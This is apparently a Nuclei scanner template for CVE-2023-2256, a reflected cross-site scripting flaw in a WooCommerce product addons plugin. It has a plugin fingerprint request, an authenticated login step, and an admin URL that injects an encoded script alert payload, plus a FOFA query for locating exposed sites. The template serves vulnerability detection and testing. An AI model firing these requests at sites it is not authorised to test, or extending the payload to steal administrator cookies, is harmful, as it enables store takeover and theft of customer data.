The Product Addons & Fields for WooCommerce WordPress plugin before version 32.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape some URL parameters in the admin panel, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
PoC代码[已公开]
id: CVE-2023-2256
info:
name: WordPress Product Addons & Fields for WooCommerce < 32.0.7 - Cross-Site Scripting
author: ritikchaddha
severity: high
description: |
The Product Addons & Fields for WooCommerce WordPress plugin before version 32.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape some URL parameters in the admin panel, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
impact: |
Attackers can inject malicious JavaScript through URL parameters in the admin panel, potentially stealing administrator session cookies and gaining full control over the WooCommerce store and customer data.
remediation: |
Update Product Addons & Fields for WooCommerce plugin to version 32.0.7 or later that properly sanitizes and escapes URL parameters in the admin panel.
reference:
- https://wpscan.com/vulnerability/1187e041-3be2-4613-8d56-c2394fcc75fb
- https://nvd.nist.gov/vuln/detail/CVE-2023-2256
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2256
cwe-id: CWE-79
epss-score: 0.06383
epss-percentile: 0.90754
cpe: cpe:2.3:a:themeisle:product_addons_\&_fields_for_woocommerce:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 3
vendor: WordPress
product: woocommerce-product-addon
fofa-query: body="wp-content/plugins/woocommerce-product-addon/"
tags: cve,cve2023,wp,wordpress,wp-plugin,xss,woocommerce,woocommerce-product-addon,authenticated,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- "woocommerce-product-addon"
- "woocommerce"
condition: and
case-insensitive: true
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=ppom&productmeta_id=5&do_meta=edit&%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100954f3e10e7da2fb1e2058c95eca87143d9c0a2d338f92dca34cf53ee3b5e2e2b0221008429e59a41c22865b7ad6060b1e91f6342a00e4f5eb843a8fdef6c0344823d92:922c64590222798bb761d5b6d8e72950